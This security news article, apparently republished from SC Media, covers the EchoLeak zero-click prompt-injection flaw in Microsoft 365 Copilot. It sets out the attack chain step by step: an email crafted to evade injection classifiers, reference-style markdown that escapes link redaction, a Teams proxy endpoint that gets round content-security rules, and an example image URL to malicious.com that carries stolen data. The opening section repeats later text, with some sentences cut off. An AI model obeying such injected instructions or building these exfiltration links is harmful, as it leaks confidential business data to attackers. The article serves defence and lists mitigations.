The revelation of a critical "zero-click" vulnerability in Microsoft 365 Copilot—tracked as CVE-2025-32711 and aptly dubbed “EchoLeak”—marks a turning point in AI-fueled cybersecurity risk. This flaw, which scored an alarming 9.3 on the Common Vulnerability Scoring System (CVSS), demonstrates how even rigorously protected, enterprise-grade AI agents can inadvertently serve as conduits for data breach and exfiltration, all without requiring a single click from the end user. As organizations worldwide race to harness the productivity boost of AI copilots, the EchoLeak incident provides a sobering lesson in the complexity, and the inherent risks, of retrieval-augmented generation (RAG) architectures processing sensitive business data.
At the center of this vulnerability sits Microsoft 365 Copilot, a RAG-based AI assistant integrated into the Microsoft cloud stack—including Outlook, OneDrive, Office, SharePoint, and Teams. On paper, the security model for Copilot blends strong context boundaries, cross-prompt injection classifiers, and layered content security policy (CSP) restrictions. Yet, the EchoLeak exploit chain identified by Aim Security found gaps in this sophisticated armor—allowing an attacker to exfiltrate sensitive internal business information, stealthily and en masse.
Traditional email phishing relies on tricking users into clicking links or running attachments. EchoLeak, however, sidesteps human error: a rogue actor can send a specially crafted email to a victim, never requiring them to interact. When Copilot processes this email, the attacker’s instructions evade Copilot’s cross-prompt injection (XPIA) defenses by addressing the intent to the email recipient, not directly to the AI model.
The method’s ingenuity extends to Copilot’s link redaction feature: normally, external markdown links are stripped from Copilot’s outputs to prevent leaking sensitive content. However, if the link is formatted as a markdown reference (e.g.,
Although the Content Security Policy (CSP) for Copilot whitelists only Microsoft domains for image loads, the researchers uncovered an overlooked proxy service within Microsoft Teams. This service—
The full attack chain empowers adversaries to direct Copilot—via a single, seemingly innocuous email—to parse and attach snippets of sensitive M365 data (emails, files, conversations) as parts of the query string of an embedded image URL. Once Copilot outputs the malicious markdown (as part of its normal user-facing response), Microsoft’s backend fetches the image, quietly sending the private data to the attacker’s infrastructure—no click, no warning, no suspicion.
"In the context of EchoLeak," security researcher Ensar Seker notes, "we see Copilot’s trust boundaries dissolving at the intersection of prompt injection, reference-based markdown links, and backend proxy mechanics. It’s an architectural wake-up call for any organization deploying AI copilots to handle business-critical data."
The underlying pivot here: any RAG-based AI—whether built on Copilot, custom LLM apps, or other SaaS platforms—that merges external instructions with internal content could face similar “scope violation” exploits. Security, therefore, can no longer be addressed solely at the prompt level or with classic filtering techniques. Instead, organizations must harden every interface where AI systems arbitrate between trusted and untrusted information domains.
In its public statement, Microsoft asserted that “no further user action is required” to remediate the vulnerability, reflecting the effectiveness of an automated cloud service patch. Nevertheless, as this flaw resulted from the interplay of multiple features—prompt scoping, markdown parsing, image proxying—it’s prudent for organizations to verify the update has been fully applied across all tenants, and to monitor for anomalous Copilot-related network traffic.
Security experts warn that this class of “scope violation” is not unique to Microsoft 365 Copilot:
1. Disallow External Email Ingestion:
Disable Copilot’s ability to automatically process or respond to external, unauthenticated instructions—especially from inbound email or messaging platforms not under organizational control.
2. Extend DLP Policy Enforcement:
Tag all Copilot and RAG outputs with metadata derived from company DLP rules. Block, redact, or alert on any query or response that involves exportable sensitive information (HR data, legal, M&A, regulated PII, etc.).
3. Enhance Prompt-Level Filtering:
Deploy prompt classifiers that not only judge for suspicious language or potential injections, but also scrutinize output for references, markdown, or encoding tricks that could signal malicious intent.
4. Monitor for Proxy Bypass Patterns:
Actively log and inspect traffic through trusted domains that serve as proxy endpoints, such as Teams’
5. Demand Transparency from AI Providers:
Push vendors—including Microsoft and other SaaS AI providers—for architectural transparency around the AI-to-cloud pipeline, so security teams can better audit what gets parsed and how outputs are constructed.
While Microsoft acted promptly to patch EchoLeak and no evidence exists of exploitation in the wild, the techniques unearthed by Aim Security reverberate far beyond the specific case. They map a new, evolving set of attack surfaces in AI-powered environments where code, content, and context intermingle at unprecedented scale and depth.
For CISOs, IT architects, and business leaders, the takeaways are clear:
Source: SC Media Microsoft 365 Copilot ‘zero-click’ vulnerability enabled data exfiltration
The Anatomy of EchoLeak: How Zero-Click Data Exfiltration Worked
At the center of this vulnerability sits Microsoft 365 Copilot, a RAG-based AI assistant integrated into the Microsoft cloud stack—including Outlook, OneDrive, Office, SharePoint, and Teams. On paper, the security model for Copilot blends strong context boundaries, cross-prompt injection classifiers, and layered content security policy (CSP) restrictions. Yet, the EchoLeak exploit chain identified by Aim Security found gaps in this sophisticated armor—allowing an attacker to exfiltrate sensitive internal business information, stealthily and en masse.Traditional email phishing relies on tricking users into clicking links or running attachments. EchoLeak, however, sidesteps human error: a rogue actor can send a specially crafted email to a victim, never requiring them to interact. When Copilot processes this email, the attacker’s instructions evade Copilot’s cross-prompt injection (XPIA) defenses by addressing the intent to the email recipient, not directly to the AI model.
The method’s ingenuity extends to Copilot’s link redaction feature: normally, external markdown links are stripped from Copilot’s outputs to prevent leaking sensitive content. However, if the link is formatted as a markdown reference (e.g.,
[ref]: <external URL>
), it isn’t redacted. This loophole enables attackers to embed external images, with Copilot’s downstream services automatically launching GET requests to fetch these images—requests capable of carrying sensitive data as query string parameters.Although the Content Security Policy (CSP) for Copilot whitelists only Microsoft domains for image loads, the researchers uncovered an overlooked proxy service within Microsoft Teams. This service—
/urlp/v1/url/content
—is used by Teams to preview external links by caching images from non-Microsoft URLs. By wrapping a malicious URL within this proxy mechanism, attackers could bypass CSP entirely, routing requests through a "trusted" domain yet receiving the data at an adversary-controlled external server.The full attack chain empowers adversaries to direct Copilot—via a single, seemingly innocuous email—to parse and attach snippets of sensitive M365 data (emails, files, conversations) as parts of the query string of an embedded image URL. Once Copilot outputs the malicious markdown (as part of its normal user-facing response), Microsoft’s backend fetches the image, quietly sending the private data to the attacker’s infrastructure—no click, no warning, no suspicion.
Scope Violation: The Larger Architectural Problem
The critical risk exposed by EchoLeak is not a flaw merely with Copilot’s implementation, but a systemic “LLM Scope Violation.” Retrieval-augmented generation (RAG) AI agents, such as Copilot, are designed to blend external (often untrusted) prompts with sensitive internal enterprise data. If input scoping is too permissive—or runtime guardrails insufficiently strict—malicious payloads from outside can be smuggled into responses, siphoning privileged information out through covert communication channels."In the context of EchoLeak," security researcher Ensar Seker notes, "we see Copilot’s trust boundaries dissolving at the intersection of prompt injection, reference-based markdown links, and backend proxy mechanics. It’s an architectural wake-up call for any organization deploying AI copilots to handle business-critical data."
The underlying pivot here: any RAG-based AI—whether built on Copilot, custom LLM apps, or other SaaS platforms—that merges external instructions with internal content could face similar “scope violation” exploits. Security, therefore, can no longer be addressed solely at the prompt level or with classic filtering techniques. Instead, organizations must harden every interface where AI systems arbitrate between trusted and untrusted information domains.
Unpacking the Exploit Chain: Step by Step
To fully grasp the sophistication and reach of EchoLeak, one must appreciate each stage of its multi-layered attack vector:1. Specially Crafted Email
- The attacker prepares an email with instructions that appear, on face value, routine—but are actually engineered to serve as prompts for Copilot when referencing or summarizing content.
- Instead of targeting Copilot's parsing directly, instructions are embedded in the email's body contextually, evading XPIA's prompt injection detection.
2. Markdown Reference Loophole
- Within this email, a malicious markdown reference is used: the
[ref]
style of markdown, which Copilot's link redaction is not set to filter. - This reference includes a specially constructed external image URL that, when fetched, will carry M365 data as query parameters (e.g.,
[url="https://malicious.com/leak.png?sensitive_data="]MALICIOUS.COM[/url]...
).
3. Teams Proxy Bypass
- Microsoft Teams’ link preview feature, documented by both Teams engineers and the security researchers, exposes a proxy endpoint at
/urlp/v1/url/content
. - By leveraging this endpoint, an attacker embeds their payload within a URL routed through trusted Microsoft domains, thereby sidestepping Copilot’s CSP rules that restrict where images can be fetched from.
4. Automated Data Exfiltration
- Upon some future interaction—such as the Copilot user referencing (or being prompted to summarize) an email topic related to the attacker’s mail—the AI includes the markdown image in its output response.
- Copilot’s backend automatically attempts to retrieve the linked image as part of rendering the output, thus “leaking” the appended internal data to the attacker-controlled endpoint, all as part of a simple GET request outside the organization’s normal security perimeter.
Microsoft’s Response: Patch, Disclosure, and Remaining Questions
Microsoft has addressed the vulnerability in its most recent security update, crediting Aim Security for the responsible disclosure of EchoLeak and confirming that the flaw had not, as of their investigation, been exploited in the wild. The company’s remedial patch apparently closes both the XPIA bypass and the markdown reference loophole, reinforcing boundaries around which external content Copilot is allowed to fetch and echo.In its public statement, Microsoft asserted that “no further user action is required” to remediate the vulnerability, reflecting the effectiveness of an automated cloud service patch. Nevertheless, as this flaw resulted from the interplay of multiple features—prompt scoping, markdown parsing, image proxying—it’s prudent for organizations to verify the update has been fully applied across all tenants, and to monitor for anomalous Copilot-related network traffic.
Assessing the Broader Risks: RAG-based AI and LLM Scope Violations
The EchoLeak incident raises serious questions about current best practices in AI-driven productivity tools, particularly those built with RAG architectures. By design, these systems aggregate enterprise data with natural language prompts—often of untrusted origin. While user interaction is supposed to be mediated by classifiers and output filters, sophisticated attacks can defeat these boundaries by exploiting lower-level integration details (such as markdown rendering or URL parsing logic).Security experts warn that this class of “scope violation” is not unique to Microsoft 365 Copilot:
- Any system that allows untrusted inputs (like public emails, user-submitted queries, or externally ingested documents) to be processed alongside confidential business data may be susceptible, especially if features are implemented that fetch remote resources or echo content in outputs.
- The reliance on CSP and domain whitelisting, while foundational, is only as robust as the smallest bypass in a sprawling web of interconnected systems—proxies, previews, link unfurling, and cloud microservices.
- Automated AI agents, when granted deep integration with business logic or company data, must be assumed high-risk targets. Attackers will inevitably seek ways to escalate from prompt poisoning to full remote data exfiltration.
- Runtime guardrails should scrutinize not only input prompts but contextually track output formation, reference chains, and resource requests.
- Organizations should enforce policy decisions around which classes of data are ever permitted to be handled or echoed by AI systems, optionally placing hard DLP (data loss prevention) gates on payloads that might exit to untrusted domains.
- Prompt-level filters may need to evolve into granular, structured-output validation, validating not just raw text for sensitive content but parsing for any kind of code, resource loader, or side-effectful computation embedded within AI outputs.
Organizational Defenses: Building Robust RAG Security Protocols
Based on the disclosures and guidance from researchers, enterprises deploying Microsoft 365 Copilot (or any RAG-based AI agent) can take several critical defenses:1. Disallow External Email Ingestion:
Disable Copilot’s ability to automatically process or respond to external, unauthenticated instructions—especially from inbound email or messaging platforms not under organizational control.
2. Extend DLP Policy Enforcement:
Tag all Copilot and RAG outputs with metadata derived from company DLP rules. Block, redact, or alert on any query or response that involves exportable sensitive information (HR data, legal, M&A, regulated PII, etc.).
3. Enhance Prompt-Level Filtering:
Deploy prompt classifiers that not only judge for suspicious language or potential injections, but also scrutinize output for references, markdown, or encoding tricks that could signal malicious intent.
4. Monitor for Proxy Bypass Patterns:
Actively log and inspect traffic through trusted domains that serve as proxy endpoints, such as Teams’
/urlp/v1/url/content
, and review for unusual outbound resource requests or query string payloads containing internal strings.5. Demand Transparency from AI Providers:
Push vendors—including Microsoft and other SaaS AI providers—for architectural transparency around the AI-to-cloud pipeline, so security teams can better audit what gets parsed and how outputs are constructed.
Lessons Learned and the Road Ahead
The CVE-2025-32711 EchoLeak event is a landmark case in the emergent landscape of AI security, extending the threat model for enterprises leveraging RAG-based assistants and copilots. Technical prowess alone is not enough: organizations must couple architectural rigor with ongoing vigilance, assuming that attackers will exploit any interface—no matter how indirect—to jump trust boundaries.While Microsoft acted promptly to patch EchoLeak and no evidence exists of exploitation in the wild, the techniques unearthed by Aim Security reverberate far beyond the specific case. They map a new, evolving set of attack surfaces in AI-powered environments where code, content, and context intermingle at unprecedented scale and depth.
For CISOs, IT architects, and business leaders, the takeaways are clear:
- Treat AI copilots as privileged actors; do not presume that layered security controls alone will suffice.
- Design for compromise: keep trusted and untrusted information flow air-gapped wherever possible.
- Continuously audit and pen-test all AI outputs, monitoring for the creative, cross-layer exploits that define the frontier of AI cybersecurity.
References
- SC Media: Microsoft 365 Copilot zero-click vulnerability enabled data exfiltration
- Microsoft Security Update Guide
- Aim Security Research Lab
- Teams Developer Tech Community
Source: SC Media Microsoft 365 Copilot ‘zero-click’ vulnerability enabled data exfiltration